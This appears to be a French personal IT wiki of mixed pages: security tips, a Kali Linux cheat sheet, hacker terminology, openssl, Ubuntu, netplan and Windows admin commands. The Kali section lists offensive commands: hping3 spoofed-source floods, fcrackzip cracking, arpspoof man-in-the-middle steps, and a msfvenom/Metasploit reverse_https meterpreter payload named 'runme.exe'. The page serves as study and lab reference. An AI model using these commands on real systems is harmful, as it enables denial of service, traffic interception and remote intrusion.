<div class="field__item" id="bkmrk-un-antivirus-dont-vo"><div class="paragraph paragraph--type--op-texte-riche paragraph--view-mode--default"><div class="text-riche"><div class="clearfix text-formatted field field--name-field-texte-riche field--type-text-long field--label-hidden field__item">- Un antivirus dont vous respectez les recommandations (mise à jour des bases virales, suppression ou mise en quarantaine des fichiers suspects).
- Un pare-feu bien configuré qui bloquera les connexions non désirées depuis et vers votre ordinateur.

</div></div></div></div>L’utilisation de ces outils ne sera efficace qu’à condition d’y associer quelques bonnes pratiques :

<div class="field__item" id="bkmrk-n%E2%80%99utilisez-jamais-un"><div class="paragraph paragraph--type--op-texte-riche paragraph--view-mode--default"><div class="text-riche"><div class="clearfix text-formatted field field--name-field-texte-riche field--type-text-long field--label-hidden field__item">- N’utilisez jamais un service ou un équipement inconnu ou abandonné (une clé USB par exemple).
- Attribuez un usage spécifique à chaque clé USB pour réduire les effets d’une éventuelle contamination.

</div></div></div></div>### 10. Accordez le juste niveau de privilèges

Plusieurs personnes peuvent avoir accès au même poste de travail avec un accès plus ou moins restreint, défini selon leurs besoins.

Lorsqu’il vous revient d’ajouter des utilisateurs à un appareil ou à un service, et donc de choisir le niveau de permission à leur accorder, appliquez toujours la règle du privilège minimum et assurez-vous que chacun des utilisateurs ait uniquement les permissions dont il a besoin. Par défaut, tous les utilisateurs d’un poste de travail ou d’un serveur doivent avoir un niveau d’accès limité au système d’exploitation et aux informations. Ensuite, il vous revient de personnaliser les attributions et possibilités de chacun.

# KaliLinux  -  Commandes utiles

### <span style="text-decoration:underline;color:rgb(35,111,161);">**I. DDoS attack**</span>

Flood ICMP paquets avec ip aléatoire :

```bash
hping3 -1 --flood --rand-source <hostip>
```

Flood UDP paquets avec ip aléatoire :

```bash
hping3 -2 --flood --rand-source <hostip>
```

Flood TCP Syn paquets avec ip aléatoire :

```bash
hping3 -S --flood --rand-source <hostip>
```

---

### <span style="text-decoration:underline;color:rgb(35,111,161);">**III. Password Attack**</span>

Cracker un zip (brute force):

```bash
#Command
fcrackzip -u -b </path/to/zip>

#Exemple
fcrackzip -u -b /home/kali/Documents/monzip.zip
```

Craquer un zip (dictionnaire):

```bash
#Command
fcrackzip -u -D -p </path/to/dictionary> </path/to/zip>

#Exemple
fcrackzip -u -D -p /home/kali/testdict.txt /home/kali/Documents/monzip.zip
```

---

---

### <span style="text-decoration:underline;color:rgb(35,111,161);">**V. Man in the Middle**</span>

Récupérer les infos de tables arp :

```
arp -a
```

activer l'ip forwarding :

```
sysctl -w net.ipv4.ip_forward=1
```

lancer le spoofing :

```
arpspoof -i <interfaceName> -t <ip victime> <ip routeur>
```

Utiliser une page web middle :

```
setoolkit
```

---

exploit windows meterpreter server :

```
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 10.11.0.5
set LPORT 8443
run
```

Generate client :

```
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.11.0.5 LPORT=8443 -f exe -o runme.exe
```

---

### <span style="text-decoration:underline;color:rgb(35,111,161);">**VI. Scan web**</span>

# Terminologie de base Cyber

### <span style="text-decoration: underline; color: rgb(52, 73, 94);">**I. Types de hackers**</span>

Ils sont rangés par considérations éthiques au regard de la loi et non eu regard de leurs convictions.

<table border="1" id="bkmrk-le-%22white-hat%22" style="border-collapse: collapse; width: 100%;"><colgroup><col style="width: 25.2748%;"></col><col style="width: 74.7014%;"></col></colgroup><tbody><tr><td style="border-style: none;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/IlSimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/IlSimage.png)

</td><td class="align-left" style="vertical-align: middle; border-style: none;">#### Le "**white hat**"

</td></tr></tbody></table>

Connu en tant que "***Hacker éthique***", ils sont employés par des sociétés privées ou des gouvernement pour identifier les failles et aider les entreprises et institution à se protéger. Il s'agit d'experts en cybersécurités agissants sous contrat et dans un cadre légal strict.

Ils comprennent entre autres :

- Les auditeurs en cybersécurité
- Les chercheurs en cybersécurité
- Les personnes agréées en OSINT

<table border="1" id="bkmrk-le-%22grey-hat%22" style="border-collapse: collapse; width: 100%;"><colgroup><col style="width: 25.2748%;"></col><col style="width: 74.7014%;"></col></colgroup><tbody><tr><td style="border-style: none;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/p9Gimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/p9Gimage.png)

</td><td class="align-left" style="vertical-align: middle; border-style: none;">#### Le "<span style="color: rgb(126,140,141);">Grey hat</span>"


</td></tr></tbody></table>

Bien qu'agissant souvent pour le bien commun ou pour prouver leurs compétences, ils le font à la marge du cadre légal voire en dehors. Il peut s'agir d'experts ou de "***freelance***" et agissent le plus souvent en électron libre. Leurs actions visent à révéler des faiblesses ou des failles dans les infrastructures, ou apporter une preuve de leurs compétences, bien qu'ils ne soient pas mandatés pour le faire.

Certains le font également pour alerter le public en exfiltrant des documents ou informations confidentielles.

Ils comprennent entre autres :

- Les lanceurs d'alertes
- Les "***security enthusiasts***"
- Les "***pentesters***" amateurs
- Les "***Hacktivistes***" (tant qu'ils n'ont pas de comportement destructeurs ou a visée terroriste).

<table border="1" id="bkmrk-le-%22black-hat%22" style="border-collapse: collapse; width: 100%;"><colgroup><col style="width: 25.2748%;"></col><col style="width: 74.7014%;"></col></colgroup><tbody><tr><td style="border-style: none;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/Mf4image.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/Mf4image.png)

</td><td class="align-left" style="vertical-align: middle; border-style: none;">#### Le "<span style="color: rgb(236,240,241); background-color: rgb(0,0,0);">**Black hat**</span>"


</td></tr></tbody></table>

Il s'agit de tous les types de pirates malveillant ou agissant de manière destructive. On y retrouve toutes les activité cybercriminelles allant du Ransomware au vol d'information confidentielle. Si la plupart du temps, ils agissent pour l'argent, certains peuvent agir par raison politique.

Ils comprennent entre autre :

- Les cybercriminels (isolés ou en organisation)
- Les organisations terroristes
- Les '***script kiddies***'
- Les "***Hacktivistes***" plus extrémistes

---

### <span style="text-decoration: underline; color: rgb(52, 73, 94);">**II. Red Team, Blue Team**</span>

# Openssl - Commandes de conversion

<span style="text-decoration:underline;">**De PFX vers .crt et .key :**</span>

- Extraire et décoder la clé privée

```
openssl pkcs12 -in <chemin/vers/pfx> -nocerts -out private.key
openssl rsa -in private.key -out private_unencrypted.key
```

- Extraire le certificat

```
openssl pkcs12 -in <chemin/vers/pfx> -clcerts -nokeys -out certificate.crt
```

---

<span style="text-decoration:underline;">**De .crt &amp; .key vers .pfx**</span>

```
openssl pkcs12 -inkey private.key -in certificate.crt -export -out myfile.pfx
```

# Schema URL

Constitution de l'URI

[![DOC - schemaURL.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/doc-schemaurl-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/doc-schemaurl-png.png)

---

Points d'attentions

[![DOC - vérification site web.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/doc-verification-site-web-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/doc-verification-site-web-png.png)

# Solidité mots de passe (2025)

[![Hive Systems Password Table - 2025 Square.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/hive-systems-password-table-2025-square-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/hive-systems-password-table-2025-square-png.png)

# Supervision

# Zabbix - Tips&Tricks

Afficher l'utilisation de la bande passante

```
In:{SW605X:net.if.in[ifInOctets.5].last(0)} / Out:{SW605X:net.if.out[ifOutOctets.5].last(0)} [{SW605X:net.if.speed[ifSpeed.5].last(0)}]
```

# Ubuntu

# Ubtunu - installation libcaca

lib caca est une librairie python qui, couplée à un parseur de lien permet de jouer une video dans le terminal en faisant une conversion directe du flus vidéo en Ascii art.

Bien que n'ayant aucune réelle utilité en soi, cela peut être drôle lorsque utilisé sur un honeypot par exemple.

Pour l'installer :

```bash
sudo apt update
sudo apt install python3.12-venv caca-utils mpv

```

Initialiser le venv python avec :

```
python3 -m venv venv
source venv/bin/activate
```

Installer le convertisseur de flux dans le venv :

```bash
python3 -m pip install yt-dlp
```

Pour lancer une vidéo :

```bash
mpv -vo caca <lien de video> 2>/dev/null
```

Pour interrompre la video : '<span style="color:rgb(132,63,161);">***ctrl+c***</span>'

# Ubuntu - Commandes utiles

#### <span style="text-decoration: underline; color: rgb(35,111,161);">**I. Commandes génériques**</span>

Récupérer l’historique des commandes entrées :

```bash
history
```

Voir le répertoire courant :

```bash
pwd
```

Voir avec quel utilisateur l'on est connecté :

```bash
whoami
```

<p class="callout success">**Astuce** : Pour filtrer le résultat d'une commande, ajouter : | grep "chainedecaractèreàrechercher"</p>

---

#### <span style="text-decoration: underline; color: rgb(35,111,161);">**II. Ressources systèmes**</span>

lancer le ressource monitor :

```shell
htop
```

voir les processus et leurs PID :

```
psaux
```

---

#### <span style="text-decoration: underline; color: rgb(35,111,161);">**III. Disques &amp; partitions**</span>

Voir sur quels SCSI et contrôleurs sont les disques :

```shell
lsblk --scsi
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/e4rimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/e4rimage-png.png)

voir l'ensemble des chemins des disques et points de montages :

```
lsblk
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/9d9image-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/9d9image-png.png)

Voir l'utilisation des disques :

```
df -H
```

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/QLfimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/QLfimage-png.png)

Rescanner la capacité disque après un extend :

```shell
echo 1>/sys/class/block/sdd/device/rescan
```

 ou

```shell
echo 1>/sys/class/scsi_device/X:X:X:X/device/block/device/rescan
```

Voir le top 10 des fichiers les plus volumineux :

```
du -ah /path/to/dir | sort -rh | head -n 10
```

---

#### <span style="text-decoration: underline; color: rgb(35,111,161);">**IV. traitement des logs**</span>

Voir un log en live :

```bash
tail -f /chemin/vers/le/log
```

Supprimer les logs plus vieux que *x* jours :

```
find /var/log/ -type f -mtime +<nbjours> -exec rm -f {} \;
```

Archiver les logs plus vieux que x jours :

```
find /var/log/ -type f -mtime +<nbjours> -exec gz {} \;
```

Voir le top 10 des fichiers les plus lourds :

```
find /var/log -type f -exec du -Sh {} + | sort -rh | head -n 10
```

Vider toutes les lignes sauf les ***n*** dernières :

```bash
echo "$(tail -1000 /var/log/messages)" > /var/log/messages
echo -e "\n### Log reduced via purge command at $(date) ###\n" >> /var/log/messages
```

---

#### <span style="text-decoration: underline; color: rgb(35,111,161);">**V. Date / Heure**</span>

Vérifier la date et l'heure :

```bash
timedatectl
```

Trouver la timezone et la paramétrer :

```bash
timedatectl list-timezones | grep <motclédelatimezone>
timedatectl set-timezone Region/Location
```

Ou pour le Paramétrer en UTC

```
timedatectl set-timezone UTC
```

Définir la date et l'heure :

```bash
timedatectl set-time yyyy-mm-dd
timedatectl set-time hh:mm:ss
```

Changer la source NTP :

Pour changer le serveur source de temps : Editer le fichier '<span style="color: rgb(132,63,161);">***/etc/systemd/timesyncd.conf***</span>'.

Redémarrer le service ntp :

```
systemctl restart systemd-timesyncd
```

---

#### <span style="text-decoration: underline; color: rgb(35,111,161);">**VI. raccourcis VIM**</span>

copier les x prochaines lignes : xyy (exemple pour 3 lignes : 3yy)

couper les x prochaines lignes : xdd (exemple pour 3 lignes : 3dd)

coller la ou les ligne(s) copiées/coupées : p

chercher une chaîne de caractères : /chainedecaractères (pour chercher l'occurence suivante, appuyer sur 'n')

enregistrer : :w

eregistrer et quitter : :wq

quitter : :q

quitter sans enregistrer : :q!

# Ubuntu - Exemple configuration Netplan

#### <span style="text-decoration:underline;">**I. Nouveau format (ipfixe):**</span>

```
network:
    ethernets:
        eth0:
            dhcp4: false
            addresses: [192.168.1.253/24]
            nameservers:
              addresses: [8.8.8.8, 8.8.4.4]
            routes:
              - to: default
                via: 192.168.1.254
    version: 2

```

---


#### <span style="text-decoration:underline;">**II. En WIFI**</span>

```
network:
  version: 2
  wifis:
    wlp3s0:
      dhcp4: no
      dhcp6: no
      addresses: [192.168.80.222/24]
      nameservers:
        addresses: [192.168.80.1, 8.8.8.8]
      access-points:
        "bssid":
          password: "pass"
      routes:
        - to: default
          via: 192.168.80.32
```

---


#### <span style="text-decoration:underline;">**III. Avec LAGG et VLAN**</span>

```
network:
  version: 2
  renderer: NetworkManager
  bonds:
    bond0:
      dhcp4: no
      interfaces: [enp4s0,enp0s31f6]
      parameters:
        lacp-rate: fast
        mode: 802.3ad
        transmit-hash-policy: layer2
        mii-monitor-interval: 100
  ethernets:
    enp4s0: {}
    enp0s31f6: {}
  vlans:
    bond0.30:
      dhcp4: no
      addresses: [192.168.1.225/24]
      gateway4: 192.168.1.254
      id: 30
      link: bond0
      routes:
        -to: 238.0.0.0
         via: 192.168.1.225
    bond0.31:
      dhcp4: no
      addresses: [172.20.6.225/16]
      gateway4: 172.20.0.254
      id: 31
      link: bond0
    bond0.33:
      dhcp4: no
      addresses: [192.168.33.95/24]
      gateway4: 192.168.33.254
      id: 33
      link: bond0
      nameservers:
        addresses: [192.168.33.11, 192.168.33.12]

```

# Ubuntu - système de fichier

Les systèmes de fichiers linux sont la plupars du temps organisés comme suit:

**/** (la racine du système)

- **/bin** (Utilitaires et programmes pour l'utilisateur) 
    - commandes principales du systèmes
    - interpreteurs de commandes (sh, bash, ...)
    - outils d'administrations systèmes (sudo, su, passwd, ...)
    - outils de manipulation de texte (grep, sed, awk, ...)
    - outils de compressions (tar, zip, gzip, ...)
    - utilitaires réseaux (ping, ifconfig, ssh, ...)
- **/boot** (Noyaux système et fichiers associés) 
    - Images du noyau
    - Images du fichier RAM
    - secteurs de boot
- **/dev** (Composants et périphériques reconnus par le système)
- **/etc** (Fichiers de configuration du système et des services) 
    - crontab (gestionaire de tâche)
    - hosts (fichier host)
    - hostname (nom de la machine)
    - passwd (liste des utilisateurs et leurs mots de passes Hashés)
    - groups (liste des groupes et de leurs membres
    - **/etc/fstab** (montage des disques et volumes au démarrage)
- **/home** (Répertoires utilisateurs et leurs environements)
- **/lib** (Librairies partagées par les programmes et composants système)
- **/lost+founds** (Présent sur chaque point de montage, contient des fichiers de récupération en cas de problèmes)
- **/media** ( Points de montage des périphériques retirables. ex: clé usb, lecteur CD, image iso, ...)
- **/mnt** (Points de montage pour les disques ou volumes montés manuellement)
- **/opt** (Répertoire d'installation pour les logiciels 'optionnels' ou installés manuellement)
- **/proc** (Système de fichier virtuel contenant des mappages en lecture vers les fichiers du Kernel)
- **/root** (Répertoire personnel de l'administrateur système)
- **/sbin** (Utilitaires et programes systèmes, souvent réservé au sperutilisateur)
- **/tmp** (Stockage pour les fichiers temporaires. Selon la configuration, se vide à chaque redémarrage)
- **/usr** (Programmes et fichiers de support utilisés par les utilisateurs) 
    - **/usr/bin** (Programmes exécutables installés par la distribution linux utilisée)
    - **/usr/lib** (Librairies partagées pour les programes dans /usr/bin)
    - **/usr/local** (Programmes non fournis par la distribution mais nécéssitant d'être exécutés par le système)
    - **/usr/sbin** (Utilitaires d'administrations systèmes additionnels)
    - **/usr/share** (Données partagées utilisées par les programmes. Icônes, fichiers de configurations par défaut, ...) 
        - **/usr/share/doc** (Documentation des logiciels additionnels installés sur le système. Organisés par paquets)
- **/var** (Toutes les données dynamiques ou variables du systèmes et des logiciels) 
    - **/var/log** (Fichiers journaux du système et des applications)

# Windows

# Windows - Commande diagnostic Active directory

Diagnostics arborescence

- [tree](https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/tree)

---

Diagnostic général

- [dcdiag](https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/dcdiag)

---

Diagnostic rôles

- [netdom query](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc835089(v=ws.11))

---

Diagnostic replication

- [repadmin](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc770963(v=ws.11))

---

Sites &amp; services

- [nltest](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11))

# Windows - Commandes windows core de base

Obtenir les informations systèmes :

```
systeminfo
```

Lancer powershell :

```
powershell
```

Lancer l’éditeur de registre :

```
regedit
```

Lancer le configurateur de serveur :

```
sconfig
```

Activer / désactiver un ou tous les firewall(s):

```
netsh advfirewall set <local|domain|public|allprofiles> state <on|off>
```

Vérifier si le proxy est présent :

```
netsh winhttp show proxy
```

Redémarrer le système immédiatement :

```
shutdown /r /t 00
```

Arrêter le système immédiatement :

```
shutdown /s /t 00
```

Monter / démonter un lecteur réseau (les options /persistent et /user sont facultatives) :

```
net use <lettreLecteur> <chemin UNC> /persistent /user:<username>
net use /delete <lettreLecteur>
```

Afficher le gestionnaire de tâches :

```
taskmgr
```

Afficher le magasin de certificats :

```
dir cert:/localmachine/<magasin>
```

Configurer un service :

```
sc config [<ServiceName>] [type= {own | share | kernel | filesys | rec | adapt | interact type= {own | share}}] [start= {boot | system | auto | demand | disabled | delayed-auto}] [error= {normal | severe | critical | ignore}] [binpath= <BinaryPathName>] [group= <LoadOrderGroup>] [tag= {yes | no}] [depend= <dependencies>] [obj= {<AccountName> | <ObjectName>}] [displayname= <DisplayName>] [password= <Password>]
```

Voir les mises à jours Windows installées :

```
Get-Hotfix
```

Voir avec quel compte l’on est logué :

```
whoami
```

Activation Windows :

```
slmgr /ipk <ProductKey>
slmgr /ato
```

Paramétrage source NTP :

```
net stop w32time
w32tm /config /syncfromflags:manual /manualpeerlist:"<AdresseServerNTP>"
w32tm /config /reliable:yes
net start w32time
w32tm /config /update
w32tm /resync /rediscover
w32tm /query /status
```

# Windows - Liste des url windows update

- [http://windowsupdate.microsoft.com](http://windowsupdate.microsoft.com)
- http://\*.windowsupdate.microsoft.com
- https://\*.windowsupdate.microsoft.com
- http://\*.update.microsoft.com
- https://\*.update.microsoft.com
- http://\*.windowsupdate.com
- [http://download.windowsupdate.com](http://download.windowsupdate.com)
- [http://download.microsoft.com](http://download.microsoft.com)
- http://\*.download.windowsupdate.com
- [http://wustat.windows.com](http://wustat.windows.com)
- [http://ntservicepack.microsoft.com](http://ntservicepack.microsoft.com)

# Windows - Matrice des permissions NTFS

### <span style="text-decoration:underline;color:rgb(52,73,94);">**I. Introduction**</span>

Lors de la création des acl avec powershell, il faut utiliser un formatage spécifique.

```powershell
$acl.AddAccessRule([System.Security.AccessControl.FileSystemAccessRule]::new(
  "<groupeAD>", "ReadAndExecute","ContainerInherit,ObjectInherit","none","Allow"
  ))
```

Le document ci-dessous décrit les éléments attendus pour chaque attribut.

---

### <span style="text-decoration:underline;color:rgb(52,73,94);">**II. Valeurs attendues**</span>

#### <span style="color:rgb(35,111,161);">**2.1 Attribut 1 : Nom de groupe**</span>

Le premier attribut est le nom du groupe / utilisateur sur lequel les permissions vont s'appliquer. Celui-ci est au format '<span style="color:rgb(132,63,161);">***Scope\\Groupe***</span>'

<table class="align-center" id="bkmrk-groupe-%2F-utilisateur" style="border-collapse:collapse;width:21.5476%;height:506.547px;"><colgroup><col style="width:21.5733%;"></col></colgroup><tbody><tr><td class="align-center" style="background-color:rgb(194,224,244);">**Groupe / Utilisateur**  
</td></tr><tr style="height:29.7969px;"><td style="height:29.7969px;">Domaine\\groupe</td></tr><tr style="height:29.7969px;"><td style="height:29.7969px;">Builtin\\groupe</td></tr><tr style="height:29.7969px;"><td style="height:29.7969px;">groupe local</td></tr><tr style="height:29.7969px;"><td style="height:29.7969px;">everyone</td></tr><tr style="height:29.7969px;"><td style="height:29.7969px;">"NT AUTHORITY\\SYSTEM"</td></tr></tbody></table>

#### <span style="color:rgb(35,111,161);">**2.2 Attribut 2 : Droits à appliquer**</span>

Le Second attribut contiennent le(s) droit(s) à appliquer. Il est possible d'en mettre plusieurs, en les séparant par une virgule.

*exemple : "Read,Write,ReadAndExecute"*

Ils sont de trois types :

- **Normaux**

- - `Read`
    - `Write`
    - `ReadAndExecute`
    - `Modify`
    - `FullControl`
    - `ListDirectory`
    - `ReadAttributes`
    - `ReadExtendedAttributes`
    - `WriteAttributes`
    - `WriteExtendedAttributes`
    - `Delete`
    - `DeleteSubdirectoriesAndFiles`
    - `ReadPermissions`
    - `ChangePermissions`
    - `TakeOwnership`
    - `Synchronize`

- **Combinés**

- - `ReadData`
    - `WriteData`
    - `AppendData`
    - `ExecuteFile`

- **Spéciaux**

- - `Traverse`
    - `CreateFiles`
    - `CreateDirectories`

#### <span style="color:rgb(35,111,161);">**2.3 Attribut 3 : Héritage**</span>

Le troisième attribut concerne la portée des droits.

<table id="bkmrk-valeur-signification" style="border-collapse:collapse;width:100%;"><colgroup><col style="width:50%;"></col><col style="width:50%;"></col></colgroup><tbody><tr><td class="align-center" style="background-color:rgb(194,224,244);">**Valeur**</td><td class="align-center" style="background-color:rgb(194,224,244);">**Signification**  
</td></tr><tr><td>None</td><td>S'applique uniquement à ce dossier</td></tr><tr><td>ContainerInherit</td><td>S'applique aux sous-dossiers</td></tr><tr><td>ObjectInherit</td><td>S'applique aux fichiers</td></tr><tr><td>ContainerInherit,ObjectInherit</td><td>S'applique aux sous-dossiers et aux fichiers</td></tr></tbody></table>

#### <span style="color:rgb(35,111,161);">**2.4 Attribut 4 : Propagation**</span>

Le quatrième attribut désigne la propagations des permissions.

<table id="bkmrk-valeur-signification-1" style="border-collapse:collapse;width:100%;"><colgroup><col style="width:50%;"></col><col style="width:50%;"></col></colgroup><tbody><tr><td class="align-center" style="background-color:rgb(194,224,244);">**Valeur**</td><td class="align-center" style="background-color:rgb(194,224,244);">**Signification**  
</td></tr><tr><td>None</td><td>Héritage normal récursif.</td></tr><tr><td>NoPropagateInherit</td><td>S'applique aux enfants direct mais pas en dessous.</td></tr><tr><td>InheritOnly</td><td>S'applique uniquement aux enfants mais pas aux parents.</td></tr></tbody></table>

#### <span style="color:rgb(35,111,161);">**2.5 Attribut 5 : Type**</span>

Le dernier paramètre définit le type d'ACL. Deux types :

- Allow
- Deny

<p class="callout info">**Info** : Pour rappel, les ACL de type 'Deny' sont prioritaire par rapport à un 'Allow'.</p>

# Windows - Système de fichier

**C:\\** Racine du système

- **Perflog** (Contient des fichiers journaux) 
    - sur les performances du système
    - diagnostics du système
- **Program Files** (Contient les programmes installés (64 bits))
- **Program Files (x86)** (Contient les programmes installés (32 bits))
- (caché) **Program data** (Contient les fichiers liés aux programmes installés) 
    - fichiers de configurations
    - fichiers temporaires
    - mises à jours applicatives
- (caché) **Recovery** (Contient l'environnement de récupération)
- (caché) **System Volume Informations** (contient des informations sur le volume) 
    - points de restauration systèmes
    - données systèmes (shadow copy service, windows backup,...)
- **Users** (contient les données utilisateurs) 
    - &lt;nom utilisateur&gt; 
        - 3D objects
        - (caché) Appdata --&gt; données et configurations des applications propres à l'utilisateur
        - (caché) Application data --&gt; même que ci dessus (Legacy)
        - Contacts
        - (caché) Cookies
        - Desktop
        - Documents
        - Downloads
        - Favorites
        - Links
        - (caché) Local settings --&gt; Réglages applicatifs propres à l'utilisateur
        - Music
        - (caché) My documents --&gt; (Legacy)
        - (caché) NetHood --&gt; raccourcis du voisinage réseau (suite à une découverte réseau avec UPnP ou autre)
        - Pictures
        - (caché) Recent --&gt; raccourcis vers les fichiers récemment utilisés
        - Saved Games
        - Searches --&gt; historique des recherches récentes
        - (caché) SendTo --&gt; Contient les raccourcis du menu contextuel "envoyer vers"
        - (caché) Start Menu --&gt; Contient les raccourcis du menu démarrer
        - Videos
        - (caché) NTUSER.DAT (et associés) --&gt; le profil "système" de l'utilisateur 
            - son identité pour le système et ses clé de registre
- **Windows** (Contient les fichiers et exécutables du système d'exploitation)
- (caché) **pagefile.sys** (swap) --&gt; fichier d'échange entre la mémoire et le disque